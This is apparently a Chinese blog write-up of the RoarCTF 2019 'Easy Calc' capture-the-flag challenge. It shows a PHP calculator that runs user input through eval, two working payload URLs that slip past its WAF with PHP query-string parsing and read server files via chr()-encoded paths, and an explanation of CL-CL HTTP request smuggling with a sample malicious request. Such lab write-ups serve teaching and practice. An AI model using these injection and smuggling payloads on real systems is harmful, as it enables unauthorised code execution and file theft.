web-[RoarCTF 2019]Easy Calc

题目要点

解法一要点:

  • PHP的字符串解析特性
  • HTTP走私攻击(HTTP数据接收不同步攻击)
  • scandir():列出 参数目录 中的文件和目录
  • var_dump() 函数用于输出变量的相关信息。
    var_dump() 函数显示关于一个或多个表达式的结构信息,包括表达式的类型与值。数组将递归展开值,通过缩进显示其结构。
  • file_get_contents() 函数把整个文件读入一个字符串中。

解法二要点:

  • HTTP走私攻击(HTTP数据接收不同步攻击)

题目内容

在这里插入图片描述

解题

打开页面,F12发现了端倪
在这里插入图片描述

注释说有WAF,同时还发现一个新的页面
查看clac.php页面 (过滤规则)

<?php
error_reporting(0);
if(!isset($_GET['num'])){
    show_source(__FILE__);
}else{
        $str = $_GET['num'];
        $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^'];
        foreach ($blacklist as $blackitem) {
                if (preg_match('/' . $blackitem . '/m', $str)) {
                        die("what are you want to do?");
                }
        }
        eval('echo '.$str.';');
}
?>

解法一:

利用PHP的字符串解析特性绕过
参考文章:利用PHP的字符串解析特性Bypass
构造payload:
目录读取: http://node3.buuoj.cn:25460/calc.php?%20num=var_dump(scandir(chr(47)))
获取flagg的内容: http://node3.buuoj.cn:25460/calc.php?%20num=file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))

解法二:

利用HTTP走私攻击
参考文章:协议层的攻击—HTTP请求走私
HTTP走私漏洞

HTTP走私漏洞

CL-CL

​ 以一个http包为例,这个数据包中存在两个Cl,按照正常规则如果存在两个Cl并且两个Cl的值不等时候,服务器会返回400错误,但是总有服务器不会严格执行规范,中间服务器在接受到这个请求后会按照第一个Content-Length对请求进行处理,但是这个请求包发到后端服务器就会按照第二个Content-length进行处理,这要就导致了一个问题,第二个Content-Length长度比第一个Content-length少一位,这要在第二次处理这个数据包的时候a就会没有被读取到从而留在了缓冲区,但是我们知道HTTP和普通的TCP不一样,存在一个 Keep-Alive 会导致TCP重用,那么下一个请求包就会把a拼接进去导致错误。

构造的恶意请求包:

POST / HTTP/1.1\r\n
Host: example.com\r\n
Content-Length: 8\r\n
Content-Length: 7\r\n
12345\r\n
a
第二次被拼接的请求包:

aPOST / HTTP/1.1\r\n
Host: example.com\r\n
Content-Length: 8\r\n
Content-Length: 7\r\n
12345\r\n
a

​ 那么如果服务器严格遵循规范呢?存在两个CL就直接400岂不是没法用了?
两个CL直接导致前端转发的服务器400,而且完整的将数据转发给了给后端。
这里又引申了一个问题,这样如果第一个前端服务器是nginx用于转发docker的流量而这个前端服务器存在一个waf,那么就可能导致这个waf失效,完整转发我们恶意代码。
在这里插入图片描述

在这里插入图片描述

已标记关键词 清除标记
相关推荐
©️2020 CSDN 皮肤主题: 技术工厂 设计师:CSDN官方博客 返回首页